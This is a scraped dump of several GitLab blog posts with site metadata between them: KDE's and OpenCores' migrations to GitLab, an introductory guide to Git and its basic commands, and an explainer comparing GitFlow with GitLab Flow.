“Each team has its own resources and workflows, but we all belong to the larger GNOME community with a common culture based on free software and open collaboration.\" Visit [gnome.org/get-involved](https://www.gnome.org/get-involved/) to get started.\n",[9,930,267],{"slug":5173,"featured":6,"template":689},"welcome-gnome-to-gitlab","content:en-us:blog:welcome-gnome-to-gitlab.yml","Welcome Gnome To Gitlab","en-us/blog/welcome-gnome-to-gitlab.yml","en-us/blog/welcome-gnome-to-gitlab",{"_path":5179,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5180,"content":5186,"config":5191,"_id":5193,"_type":14,"title":5194,"_source":16,"_file":5195,"_stem":5196,"_extension":19},"/en-us/blog/welcome-kde",{"title":5181,"description":5182,"ogTitle":5181,"ogDescription":5182,"noIndex":6,"ogImage":5183,"ogUrl":5184,"ogSiteName":673,"ogType":674,"canonicalUrls":5184,"schema":5185},"Why the KDE community is #movingtogitlab","Open source software community giant KDE finished phase one of their migration to GitLab and has joined our GitLab open source program. Check out what's next for KDE and GitLab.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681382/Blog/Hero%20Images/migratingbirds.jpg","https://about.gitlab.com/blog/welcome-kde","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Why the KDE community is #movingtogitlab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Nuritzi Sanchez\"}],\n        \"datePublished\": \"2020-06-29\",\n      }",{"title":5181,"description":5182,"authors":5187,"heroImage":5183,"date":5188,"body":5189,"category":10,"tags":5190},[2773],"2020-06-29","\n\nThe [KDE community](https://kde.org/) is [#movingtogitlab](https://twitter.com/hashtag/movingtogitlab)! 
After announcing the original decision to migrate to GitLab in November 2019, KDE has officially completed phase one of their migration, and contributors have begun to use GitLab on a daily basis at invent.kde.org. Read on to learn more about KDE's migration story.\n\n## About KDE\n\nKDE is an international community that creates open source software for desktops and mobile devices. KDE software is compatible with multiple platforms, including GNU/Linux, FreeBSD, Windows, macOS, and Android. Their products are used by millions of home and office workers and are being deployed in schools around the world.\n\nWith more than 2,700 artists, designers, programmers, translators, writers, and other contributors from across the globe, the KDE community is thriving.\n\nTogether, this community creates and maintains more than 200 applications and countless add-ons, plugins, and Plasmoids, 1000+ repositories, 80+ frameworks for Qt developers, and more than 2,600 projects. KDE software is translated into more than 100 languages to enable vast global reach.\n\n## Why KDE moved to GitLab\n\nOne of the main reasons that KDE decided to move to GitLab is to improve the newcomers story and make it easier to start contributing to KDE software. As [Aleix Pol](https://ev.kde.org/corporate/board/), President of KDE e.V says, \"Adopting GitLab has been a natural next step for us. Simplifying the onboarding experience for new contributors is one of our main goals in the KDE community. 
Being able to allow project contributors to easily participate in how the products they maintain are tested and delivered will certainly be a turning point for our ecosystem.\"\n\n\"By using a platform offering an interface and workflow that most open source developers are nowadays familiar with, we are confident that we are lowering the bar for new contributors to join us, and are providing the foundation for our community to scale in the following years,\" added [Neofytos Kolokotronis](https://ev.kde.org/corporate/board/), member of KDE e.V.'s Board of Directors and a core member of KDE's Onboarding team.\n\nAnother important consideration for the KDE community was to move to a product that was well-supported and where feedback from the community would be taken into account. With a release every month, GitLab has fast-paced development and is actively maintained by the company and community alike. Community members help to shape the way the product is built, and there's an [open roadmap](/direction/) since [transparency is one of GitLab's core values](https://handbook.gitlab.com/handbook/values/#transparency).\n\nMoving to new tools is a lot of work for established communities like KDE. Migration decisions require careful communication and the complex task of gathering community consensus.\n\nThe KDE team made the decision to migrate away from its [former tech stack](https://gitlab.com/gitlab-org/gitlab/-/issues/24900#gitlab-replacements) after following a series of carefully designed steps. First, they talked to the sysadmin team and then formed a migration team to evaluate the move. Next, the sysadmin team completed a thorough study of GitLab's features and did an intake and comparison of the community's needs against those product features. 
Then, they created a process that allows KDE to run short test cycles with some projects, document the process, and provide feedback to the community.\n\nThe migration started by moving some smaller and more agile KDE teams that were very interested in testing and providing feedback. After this cycle was completed successfully, KDE started migrating teams with a larger codebase and more contributors. Once all of the major issues were resolved, they made the final switch for all remaining projects they planned to move. The sysadmin team documented the results after each step and shared them directly with the KDE community to receive feedback and gather consensus on how to proceed.\n\nAs the switch to GitLab fell directly under the scope of KDE's [\"Streamlined Onboarding of New Contributors\" goal](https://community.kde.org/Goals/Streamlined_onboarding_of_new_contributors), the KDE Onboarding team was also involved from the start, working very closely with the sysadmin team, who were leading the effort. The community was involved in the decision-making from the beginning, and stayed up-to-date on each phase of the migration, and all questions and concerns were answered and addressed along the way.\n\n\"This was a major change for us, but we are very satisfied with how our community collaborated over long discussion threads. We believe that by working together we made the best decisions as we moved forward,\" says Neofytos.\n\n## Migration challenges and solutions\n\nThe biggest challenge for KDE was the sheer volume of data they were dealing with and how it was integrated into the numerous tools in use (including [Phabricator](https://www.phacility.com/phabricator/)). With more than 1,000 repositories, this migration was a big undertaking.\n\nTo address this challenge, KDE decided to approach the migration in phases rather than do it all at once. 
By phasing the migration, they were able to deal with different data types, such as repositories and tasks, separately.\n\nKDE developed custom tools to make bulk updates easier throughout the migration process. These tools help set the name, description, and avatar of the projects alongside a number of settings, for example, protected branches, and merge methods. By using these custom tools for bulk updates, KDE was also able to avoid granting maintainer access to individual contributors. KDE only allows maintainer access for sysadmins per their access and permissions policy.\n\nKDE ported custom Git hooks to ensure that certain checks and actions continued after the move to Gitlab. These include checks to ensure file encodings match KDE requirements and that bugs on their Bugzilla installation were closed as needed.\n\nIn order to support their translation community, which still uses Subversion in their workflow, KDE also built tooling to export SSH keys from GitLab to avoid the need to update these in two places.\n\nKDE also adjusted the tools used to build and develop KDE software to make them compatible with the new repository structure in GitLab.\n\nAt this point, KDE overcame most of their migration hurdles. Once the preparation work was finished to clean up a number of systems to work more natively with GitLab, the actual migration took about one day.\n\nBut there are a few more challenges left before KDE can transition continuous integration (CI) and task management over to GitLab. 
To follow along with the KDE migration, you can take a look at the [list of issues that KDE is tracking](https://gitlab.com/gitlab-org/gitlab/-/issues/26581).\n\n## Architectural decisions\n\nA common challenge for organizations moving to GitLab is deciding how to structure their groups to best enable their community's workflows and allow them to abide by their policies.\n\nKDE decided to tackle this challenge by setting up a series of groups at the top level of GitLab to act as categories. KDE's 1,200 repositories were then sorted into each of these categories.\n\nKDE formed this architectural strategy to help make projects more discoverable. KDE wanted to avoid the impracticality of people needing to scroll endlessly through repositories. Setting up top-level categories also allows developers to get an easier overview of merge requests for the categories they are most interested in.\n\nWith regards to permissions, KDE uses a single master \"KDE Developers\" group to manage membership and permission levels. Everyone there is given \"Developer\" access. This group is then invited to all of the groups containing repositories except for the ones containing the KDE website and infrastructure repos. This method of dealing with permissions allows KDE to maintain a single source of truth.\n\n## GitLab + KDE = ❤️\n\nKDE is using the [Community Edition](/install/ce-or-ee/) of GitLab because of their commitment to open source. They are a member of our [GitLab for Open Source](/solutions/open-source/) program, and have been actively collaborating with GitLab team members throughout the migration. 
One of the benefits of using the GitLab for Open Source program for large migration efforts is that the community often offers some extra assistance through the evaluation period and beyond.\n\nFor example, the GitLab for Open Source program has a [public tracker for KDE's migration](https://gitlab.com/gitlab-org/gitlab/-/issues/24900), which is used to communicate and better understand at a glance the issues that are especially important. This allows KDE, GitLab, and the larger open source community to collaborate on challenges together.\n\n\"GitLab's values of [collaboration](https://handbook.gitlab.com/handbook/values/#collaboration) and [transparency](https://handbook.gitlab.com/handbook/values/#transparency) really shine through,\" says Neofytos. \"We appreciate their openness to accepting merge requests from community members and considering proposals for new features. We have had a great experience so far collaborating with members of the GitLab community and members of the GitLab team – from developers to program managers to product owners alike.\"\n\nNow that phase one of the KDE migration is complete, we look forward to continuing to collaborate with KDE through the remaining phases of the migration.\n\n### Summary of the KDE migration\n\n * Phase 1: Code hosting & review ✅\n * Phase 2: CI\n * Phase 3: Task management for developers\n\n## How to contribute to KDE\n\nKDE has an amazing community and they welcome new members! Existing members are happy to provide feedback on newcomers' contributions with the goal of helping them learn. Every day more and more people join the ever-growing KDE family – and there's always room for more!\n\nKDE has a rich infrastructure of web resources, forums, mailing-lists, IRC (chat), and many other ways to get in touch. 
To learn more about joining the KDE community, visit their \"[Get Involved](https://community.kde.org/Get_Involved)\" page, which offers guidance to all contributors from all backgrounds.\n\n",[9,910,685],{"slug":5192,"featured":6,"template":689},"welcome-kde","content:en-us:blog:welcome-kde.yml","Welcome Kde","en-us/blog/welcome-kde.yml","en-us/blog/welcome-kde",{"_path":5198,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5199,"content":5205,"config":5212,"_id":5214,"_type":14,"title":5215,"_source":16,"_file":5216,"_stem":5217,"_extension":19},"/en-us/blog/welcoming-opencores-to-gitlab",{"title":5200,"description":5201,"ogTitle":5200,"ogDescription":5201,"noIndex":6,"ogImage":5202,"ogUrl":5203,"ogSiteName":673,"ogType":674,"canonicalUrls":5203,"schema":5204},"OpenCores come to GitLab","OpenCores moves to GitLab to accelerate digital design flow.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749669768/Blog/Hero%20Images/gitlab-opencores-oliscience.jpg","https://about.gitlab.com/blog/welcoming-opencores-to-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"OpenCores come to GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Andrea Borga\"},{\"@type\":\"Person\",\"name\":\"David Planella\"}],\n        \"datePublished\": \"2019-12-03\",\n      }",{"title":5200,"description":5201,"authors":5206,"heroImage":5202,"date":5209,"body":5210,"category":299,"tags":5211},[5207,5208],"Andrea Borga","David Planella","2019-12-03","\n\n[OpenCores](https://opencores.org), the largest and most popular Gateware\ndevelopment community with over [300K members and 1200+\nprojects](https://opencores.org/about/statistics), is moving to GitLab. 
This\nis excellent news all around: as a catalyst for accelerating IP core development\nand for introducing GitLab to innovative uses in the scientific and electronic\ndesign communities.\n\n## Gateware and OpenCores\n\n![Gateware design flow diagram](https://about.gitlab.com/images/blogimages/welcoming-opencores-to-gitlab/gateware_flow.png \"Gateware flow\")\n\nOpenCores is a repository of reusable units of logic, open to use as building\nblocks for the electronics design community. These units are most commonly known as\n[Intellectual Property (IP)\ncores](https://en.wikipedia.org/wiki/Semiconductor_intellectual_property_core),\nand are described (coded), in [Hardware Description\nLanguage](https://en.wikipedia.org/wiki/Hardware_description_language) (HDL)\nfor the most part.\n\n### What is gateware?\n\nIn the semiconductor industry, these are the basic constituents of advanced\ndigital designs, collectively known as\n**gateware**: A layer in the electronics development chain positioned in\nbetween _hardware_ (such as a Printed Circuit Board – PCB – or a packaged chip),\nand _firmware_ (a set of decoded and executed instructions for a microprocessor).\n\n### What is OpenCores?\n\nThe [OpenCores portal](https://opencores.org) hosts the source code for a\nmultitude of digital gateware projects. In its more than 20 years of web history, it has\nevolved into a platform that enables its user community to discover, showcase,\nand manage such projects, including revision control for [source code](/solutions/source-code-management/).\n\nThe target devices for gateware have historically been\n[FPGA](https://en.wikipedia.org/wiki/Field-programmable_gate_array) (Field\nProgrammable Gate Arrays) and\n[ASIC](https://en.wikipedia.org/wiki/Application-specific_integrated_circuit)s\n(Application Specific Integrated Circuits), which allow building a vast range\nof hardware digital electronics appliances. 
These are often described as\n[SoC](https://en.wikipedia.org/wiki/System_on_a_chip) (System on a Chip).\n\nIn recent years, the OpenCores portal has been particularly focused on hosting FPGA\napplications, with the intention to enlarge the pool of available cores based\non emerging hardware description methods, such as\n[HLS](https://en.wikipedia.org/wiki/High-level_synthesis) (High-level\nsynthesis).\n\nOpenCores is also the place where digital designers meet to showcase, promote,\nand talk about their passion and work. They do this through forums, news feeds,\nand much more!\n\n### Who maintains the OpenCores portal?\n\n[Oliscience](http://oliscience.nl/) (open logic interconnects science) act as\nthe stewards of the OpenCores community and its portal. Oliscience is an\ninitiative originated from the\n[CERN](/customers/cern/)-Nikhef Business Incubation\nCentre (CERN-BIC@Nikhef), and is [supported](https://opencores.org/partners) by\n[Nikhef](https://www.nikhef.nl/en/), the Dutch National Institute for Subatomic\nPhysics, and [ASTRON](https://www.astron.nl/), the Netherlands Institute for\nRadio Astronomy.\n\nAs part of the stewardship charter, Oliscience is committed to maintaining and\nsupporting the OpenCores portal. This mission involves globally promoting its\ncommunity, fostering the use of open standards and practices, actively\ndeveloping the portal infrastructure and content, and more.\nThe [Wishbone bus](https://en.wikipedia.org/wiki/Wishbone_(computer_bus)),\nused throughout OpenCores designs, is one of the most well-known examples.\n\n## Leading change and embracing the DevOps culture for Gateware development\n\n[Moore's law](https://en.wikipedia.org/wiki/Moore%27s_law) is slowing down, and\nthe semiconductor industry is starting to experience a new resurgence. 
With a\nwave of new opportunities arising, FPGA is one of the key technologies that\nplay a crucial role in the future of computing architectures.\n\nThe barrier to entry for becoming a gateware developer is considerably higher than learning a new programming language as a software developer. As\nsuch, the digital electronics industry is continually striving to simplify\nthe approach to programmable logic.\n\nOpen Source IP Cores play a significant role in this goal. They unlock a\nvast knowledge pool that enables new gateware developers to start hacking on\nnew projects straight away. They can use existing solutions to draw knowledge\nvery quickly.\n\nIP Cores strive for quality, and quality calls for a structured way to assess\nthe content of a code bundle. This is where Continuous Verification (CV) comes into\nplay.\n\nIn the context of programmable logic, CV is a\nworkflow in which Gateware defined in a [HDL](https://en.wikipedia.org/wiki/Hardware_description_language)\nruns against standardized testbenches and benchmarked to assess and rank its\nquality. Full coverage for test cases and failure corner cases is guaranteed.\n\n## Accelerating digital design with GitLab\n\nThe OpenCores community leaders have strong ties to [CERN](https://home.cern/)\nand the [European Space Agency](https://www.esa.int/). Both are leading\nresearch organizations committed to supporting their respective scientific\ncommunities, which use GitLab for internal development.\n\nBoth organizations and the electronics industry in general are particularly\ninterested in a better assessment of the quality of gateware products, as their\nusage in industrial and commercial applications continues to increase at an\naccelerated rate. 
When you launch a satellite into space, you can't just press\nthe reset button if there is a bug!\n\nWhile talking to those teams, and hearing the preliminary exploration of\nimplementing CV practices into gateware design, [GitLab's integral CI/CD\nfeatures](/solutions/continuous-integration/) seemed a natural fit to pioneer the adoption of a DevOps approach to\ndigital design.\n\nSource control was also a feature that would enable engineers to share and\ncollaborate on their code in the public space. In summary, the benefits of a\nsingle application for the entire DevOps cycle, with the ultimate goal of\nreducing the gateware design cycle time made the decision easy.\n\nThe next objective for the OpenCores team is to implement a CV process in the\nOpenCores portal, starting with FPGA and until ASICs. It's an ambitious one,\nwhich requires ambitious partners.\n\nAndrea Borga, Oliscience CEO mentions:\n> we have a very strong scientific background, and we love to make experiments…\n> all the time! Exploring new ideas, and striving for impeccable execution are\n> embedded in our engineering way of thinking. You need innovative and\n> ambitious partners to achieve equally innovative and ambitious goals. This\n> is why we do what we do, and why we firmly believe GitLab's vision and spirit\n> strongly align with our own. 
This is how we chose to go with them.\n\nGitLab is thrilled to start working with the OpenCores team, to contribute to\nthat goal and welcoming them to a community that leading Open Source projects\nsuch as Drupal, GNOME, KDE, Debian, Freedesktop and many more are already a\npart of.\n\n[Cover image](https://www.flickr.com/photos/130561288@N04/39116042294/) by\n[Fritzchens Fritz](https://www.flickr.com/photos/130561288@N04/),\nlicensed under [CC0 1.0](https://creativecommons.org/publicdomain/zero/1.0/)\n{: .note}\n",[685,109,9,930,267],{"slug":5213,"featured":6,"template":689},"welcoming-opencores-to-gitlab","content:en-us:blog:welcoming-opencores-to-gitlab.yml","Welcoming Opencores To Gitlab","en-us/blog/welcoming-opencores-to-gitlab.yml","en-us/blog/welcoming-opencores-to-gitlab",{"_path":5219,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5220,"content":5226,"config":5231,"_id":5233,"_type":14,"title":5234,"_source":16,"_file":5235,"_stem":5236,"_extension":19},"/en-us/blog/what-is-git-the-ultimate-guide-to-gits-role-and-functionality",{"title":5221,"description":5222,"ogTitle":5221,"ogDescription":5222,"noIndex":6,"ogImage":5223,"ogUrl":5224,"ogSiteName":673,"ogType":674,"canonicalUrls":5224,"schema":5225},"What is Git? The ultimate guide to Git's role and functionality","Want to complete your projects with Git? Discover all of Git's benefits and features in our comprehensive guide.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749673991/Blog/Hero%20Images/Git.jpg","https://about.gitlab.com/blog/what-is-git-the-ultimate-guide-to-gits-role-and-functionality","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What is Git? 
The ultimate guide to Git's role and functionality\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab\"}],\n        \"datePublished\": \"2024-11-14\",\n      }",{"title":5221,"description":5222,"authors":5227,"heroImage":5223,"date":5228,"body":5229,"category":10,"tags":5230},[970],"2024-11-14","Git is a must-have tool in the world of modern software development. In this comprehensive guide, we explain in detail what the Git tool is, its role in source code versioning, and how it works. Whether you're a beginner or an expert, this guide will give you a deep understanding of Git and its many features.\n\n## What is Git?\n\nGit is a source control tool that has quickly become a must-have in the software development ecosystem. Git's ability to meticulously track project changes makes it an essential tool for developers aiming to efficiently manage their projects. Therefore, mastering Git has become a vital skill for anyone aiming to excel in the field of software development.\n\n### What is version control?\n\n[Version control](https://about.gitlab.com/topics/version-control/what-is-git-version-control/) enables you to track changes to a software's source code. Thus, a software's delivered version consists of a set of specific versions of each of its components and source code files. For example, an icon might have only been changed twice, while a code file might have undergone several dozen changes over time.\n\n## What are Git's features?\n\nIn development, maintaining rigorous management of changes to a software's source code is important. Without this, ensuring the consistency and reliability of development teams' work is impossible. Fine-tuned change management can also make it easier to identify the source of a problem. Similarly, it reduces the risk of conflicts and file overwriting. 
Indeed, Git facilitates and streamlines software versioning precisely for this purpose.\n\nTo better understand Git and how it works, below we've outlined some of the key features that make it easy to optimize source code management as well as collaboration across teams.\n\n### Visualization of your project history\n\nIn the software development ecosystem, [the commit history](https://about.gitlab.com/blog/keeping-git-commit-history-clean/) is a core pillar for tracking project progress on Git. That's why Git offers developers a detailed history of all changes made to the   \nsource code.\n\nFor each new commit, the following are recorded:\n\n* specific changes made to project files\n* an explanatory message from the developer who made the change\n\nThese elements help improve the development team's communication and mission, allowing them to more quickly understand the ins and outs of each change made to the code.\n\nIn addition to monitoring project developments, this history allows you to go back if necessary, cancel part of the changes or, conversely, fetch only part of the changes from one branch to another. This function therefore plays an essential role in maintaining the transparency, consistency, and quality of a project's source code in Git, as well as collaboration within the development team and operational efficiency to solve problems.\n\nCheck out our tutorial on [how to create your first Git commit](https://docs.gitlab.com/ee/tutorials/make_first_git_commit/).\n\n### Greater autonomy for teams\n\nAnother essential feature of the Git tool is [distributed development](https://git-scm.com/about/distributed). Thanks to its decentralized structure, Git allows development teams to work simultaneously on the same project. Each team member has their own copy of the project, where each of their changes can be versioned. This allows them to work autonomously on specific features while reducing conflict or overwriting risks. 
This approach offers great flexibility for developers who can then explore different ideas or experiment with new features without interfering with their colleagues' work.\n\nDistributed development also enhances resilience to server failures. Thus, even in the event of a failure, each person has a copy on which they can continue to work offline. Changes can then be synchronized once the server is available again, thereby reducing the risk of work disruption for development teams and update constraints for operational teams.\n\n### Optimizing development workflows\n\nOne of Git's most powerful features is the ability to [manage branches and their mergers (branching and merging)](https://git-scm.com/about/branching-and-merging). These allow teams to work in parallel in a collaborative and organized way. Each new code addition or bug fix can be independently developed and tested to ensure reliability. Developers can then simply merge changes into the project's main branch.\n\nBy adopting this approach, teams can track code evolution, collaborate easily and efficiently, reduce conflicts between different versions, and ensure continuous integration of developed features.\n\nUsing these two features, teams can develop projects continuously and in an agile manner while regularly deploying new code versions. This practice greatly facilitates change management while reducing the risk of errors.\n\n## What are Git's benefits?\n\nTo thoroughly understand Git, it's important to fully recognize the benefits it offers to your development teams:\n\n* **Decentralized version management:** With Git, each developer has a complete copy of the project history, allowing them to work independently.  
\n* **A tool designed around security:** Unlike other source control tools, Git was designed from the outset to ensure the integrity of all elements of the repository with a cryptographic Secure Hash Algorithm (SHA1 and [SHA-256](https://about.gitlab.com/blog/gitlab-now-supports-sha256-repositories/) to date). This algorithm aims to protect the project's code and history from any modifications, whether malicious or not. In addition, each commit (creation of a new version) can be automatically signed (GPG) to ensure change traceability. This makes Git a particularly safe and secure tool, which guarantees the integrity and authenticity of your source code and its history.  \n* **A fast and effective tool:** The Git tool has been designed to maximize efficiency during development. Its speed allows developers to perform complex operations, such as commits, branching, and merging, in minimal time, even on large code bases. It also ensures a minimum fingerprint on the hard disk and during network exchanges. This efficiency then translates into rapid response times during backups, consultations, and project history changes.  \n* **Greater work flexibility:** Git supports a wide variety of development workflows. Whether you prefer centralized development models or more linear approaches, Git adapts easily. This ability to manage different workflows provides teams with numerous options for how they work.  \n* **Ease of integration:** Git excels in its ability to integrate with a wide array of existing development tools and platforms. The breadth of this compatibility allows teams to manage their projects more effectively by leveraging the best DevSecOps tools and practices.  \n* **A widely followed open-source project:** Another significant benefit of Git is that it's an open-source project supported by a dynamic and dedicated community which ensures its constant improvement. 
This active participation from individuals and companies in the Git community ensures the regular addition of new features and improvements through continuous updates.\n\n## What are Git's main commands?\n\nThe open-source Git project offers a wide variety of commands to make teamwork easier.  \nHere are some of the most commonly used commands.\n\n* **git init:** Initialize a new Git repository.  \n* **git clone \\[url\\]:** Clone an existing repository.  \n* **git add \\[file\\]:** Add a file to the index.  \n* **git commit:** Validate changes made.  \n* **git commit \\-m \"message\":** Validate changes with a message.  \n* **git status:** View the status of files in the working directory.  \n* **git push:** Send changes to remote repository.  \n* **git pull:** Fetch changes from the remote repository and merge them with the local repository.\n\nWhile these commands are essential to getting started with Git, it's important to note that there are plenty of other commands. See the [list of Git commands](https://git-scm.com/docs).\n\n## Git and GitLab\n\nGitLab is a collaborative open-source development platform covering all stages of the DevSecOps lifecycle and providing a Git server for efficient team collaboration.\n\nBeyond source code management, GitLab offers a complete suite enabling continuous integration and distribution, deliverables management, security and incident management, as well as all associated traceability, real-time task planning and tracking, deployment monitoring, software versioning, and the associated document space.\n\n## Git FAQs\n\n### Why use Git?\n\nGit is all about efficiency. Git's decentralized system based on branching and merging features allows development teams to work on the same project without interfering with others' work or, more importantly, creating version conflicts.\n\n### Is Git software?\n\nGit is an open-source project. Therefore, it's free and open to everyone. 
However, you need to [install Git](https://docs.gitlab.com/ee/topics/git/how_to_install_git/) on your device before you can start working.\n\n### What is a branch in Git?\n\nIn Git, a branch is a pointer to a change history. Thus, each main branch points to the last commit performed on it. It is therefore possible to have many parallel branches, each with its own history but the same root.\n\n### What is a commit?\n\nIn Git, a commit is a record of changes to a software's source code. Each commit is accompanied by an explanatory message that traces the history of all changes. This makes project tracking easier, and there's always the option to revert to earlier, functional versions if there's a problem.\n\n### What is the benefit of branches in Git?\n\nDeveloping features in branches allows developers to work simultaneously on several distinct features. In addition, this avoids compromising the main branch with unstable code. Moreover, implementing branches in Git is significantly more lightweight than in other version control systems.",[751,867,9],{"slug":5232,"featured":6,"template":689},"what-is-git-the-ultimate-guide-to-gits-role-and-functionality","content:en-us:blog:what-is-git-the-ultimate-guide-to-gits-role-and-functionality.yml","What Is Git The Ultimate Guide To Gits Role And Functionality","en-us/blog/what-is-git-the-ultimate-guide-to-gits-role-and-functionality.yml","en-us/blog/what-is-git-the-ultimate-guide-to-gits-role-and-functionality",{"_path":5238,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5239,"content":5245,"config":5250,"_id":5252,"_type":14,"title":5253,"_source":16,"_file":5254,"_stem":5255,"_extension":19},"/en-us/blog/what-is-gitflow",{"title":5240,"description":5241,"ogTitle":5240,"ogDescription":5241,"noIndex":6,"ogImage":5242,"ogUrl":5243,"ogSiteName":673,"ogType":674,"canonicalUrls":5243,"schema":5244},"What is GitFlow?","This article introduces the differences between GitFlow and GitLab Flow, explains what GitFlow is, how it 
works, its benefits, and answers frequently asked questions.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749659838/Blog/Hero%20Images/AdobeStock_662057734.jpg","https://about.gitlab.com/blog/what-is-gitflow","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What is GitFlow?\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab Team\"}],\n        \"datePublished\": \"2024-09-27\",\n      }",{"title":5240,"description":5241,"authors":5246,"heroImage":5242,"date":5247,"body":5248,"category":10,"tags":5249},[3594],"2024-09-27","In GitFlow, developers create a separate \"`develop`\" (for development) branch in addition to the \"`main`\" (for operation) branch and set it as the default. However, with [GitLab Flow](https://about.gitlab.com/topics/version-control/what-is-gitlab-flow/), work can begin directly on the `main` branch. GitLab Flow incorporates pre-production branches, allowing for bug fixes before merging changes into the `main` branch and deploying to production. For example, teams can add as many pre-production branches as needed, such as flowing from `main` to test, test to acceptance, or acceptance to production. \n\nIn this article, you'll learn the differences between GitFlow and GitLab Flow, what GitFlow is, how it works, its benefits, and get answers to frequently asked questions. 
\n\n## Table of contents\n- [What is GitFlow](#what-is-gitflow)\n- [How GitFlow works](#how-gitflow-works)\n- [How GitFlow and GitLab Flow differ](#how-gitflow-and-gitlab-flow-differ)\n- [GitFlow's workflow](#gitflow's-workflow)\n- [GitLab Flow's workflow](#gitlab-flow's-workflow)\n- [Benefits of using GitFlow and its features](#benefits-of-using-gitflow-and-its-features)\n- [GitFlow example](#gitflow-example)\n- [GitLab Flow and GitFlow FAQ ](#gitlab-flow-and-gitflow-faq)\n\n## What is GitFlow\n\nGitFlow is a Git workflow designed for managing branches in Git (a distributed version control system); it serves as a branching model for Git repositories. Created to simplify complex software release management, it was introduced by Vincent Driessen in 2010. It is particularly popular among large teams. \n\n## How GitFlow works\n\nCompared to trunk-based development, GitFlow features persistent branches and tends to involve larger commits. GitFlow can be used for projects with scheduled release cycles and aligns with [DevOps](https://about.gitlab.com/solutions/devops-platform/) best practices for continuous delivery. GitFlow provides a structured workflow where branches are defined for specific purposes, such as creating feature branches off the `develop` branch and the 'main' branch, preparing `release` branches, and eventually merging into `main`. This structure makes it easier for teams to understand where changes should be integrated within their development pipeline. \n\n## How GitFlow and GitLab Flow differ\n\nGitFlow is a Git branching model that utilizes multiple primary branches in addition to feature branches. [GitLab Flow](https://about.gitlab.com/topics/version-control/what-is-gitlab-flow/) aims to address some of the complexities inherent in GitFlow, enabling team members to work more efficiently. Let's examine the workflow differences in more detail. \n\n### GitFlow's workflow\n\nThe GitFlow workflow involves the following five types of branches: \n\n1. 
main\n2. develop \n3. feature\n4. release \n5. hotfix\n\nWhen using GitFlow for code development, you work with the main branch and various supporting branches. There are two primary long-lived branches: the main branch for production-ready code, and the develop branch for integrating source code under development. Codes are stabilized in the `develop` branch, prepared to be released, and then merged into the main branch when ready. Supporting branches, such as feature, release, and hotfix branches, are created to handle specific development tasks. \n\n### GitLab Flow's workflow\n\nGitLab Flow streamlines development by preventing the overhead associated with releases, tagging, merging, and more. \n\nGitLab Flow is a simplified alternative to GitFlow, combining feature-driven development with issue tracking capabilities. Using GitLab Flow enables simple, straightforward, and efficient workflows. GitLab Flow incorporates best practices to help software development teams release features smoothly. \n\nGitLab Flow is the workflow used in GitLab's own development. It involves branches such as the `main` branch; a pre-release testing branch, `pre-production`; a branch for managing released code, `production`; and branches for feature development or bug fixes like `feature` and `hotfix`. Teams can add as many pre-production branches as they need. For example, creating flows such as from `main` to test, from test to approval, and from approval to production. \n\nWhile teams create feature branches, they also manage production branches. Once the main branch is ready for deployment, it will be merged into the production branch and released. GitLab Flow can also be utilized with release branches. Teams needing public APIs must manage different versions; GitLab Flow facilitates this by allowing the creation of individually manageable branches like `v1` and `v2`, making it convenient to revert to `v1` if bugs are detected during code review. 
\n\n## Benefits of using GitFlow and its features\n\n### 1: Rapid handling of bug fixes\n\nOne benefit of using GitFlow is the ability to quickly handle bug fixes in the production environment. GitFlow is employed as a Git (distributed version control system) workflow, particularly by large teams engaged in complex software development. \n\n### 2: Ensured testing\n\nWhen releasing software from a release branch, you can allocate time for users to test in a staging environment. This can occur independently of ongoing code development. Furthermore, as commits flow downstream through different stages, it helps ensure testing across all relevant environments. \n\n### 3: Streamlined software development process\n\nUsing GitFlow allows you to leverage Git to its full potential. This, in turn, helps streamline the software development process. \n\n### 4: More efficient collaboration, conflict resolution, and continuous delivery\n\nImplementing GitFlow enhances collaboration efficiency. Merge conflicts can be resolved quickly, enabling continuous delivery. \n\n## GitFlow example\nThe diagram below illustrates an example configuration of GitFlow. It should help clarify the overall flow, including the different branches and their structure.  \n\n![GitFlow example](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749673714/Blog/Content%20Images/AdobeStock_569852816.jpg)\n\n## GitLab Flow and GitFlow FAQ \n\n### Q: What is Git Feature Flow? \n\nA: It is one of the proposed development workflows that utilize Git. Git Feature Flow is suitable for handling simpler development requirements. \n\n### Q: Is GitLab Flow worth using? \n\nA: Yes. GitLab Flow reduces the overhead associated with activities like releasing, tagging, and merging. These can be common issues encountered in other Git workflows. For more details, see [these GitLab Flow best practices](https://about.gitlab.com/topics/version-control/what-are-gitlab-flow-best-practices/). 
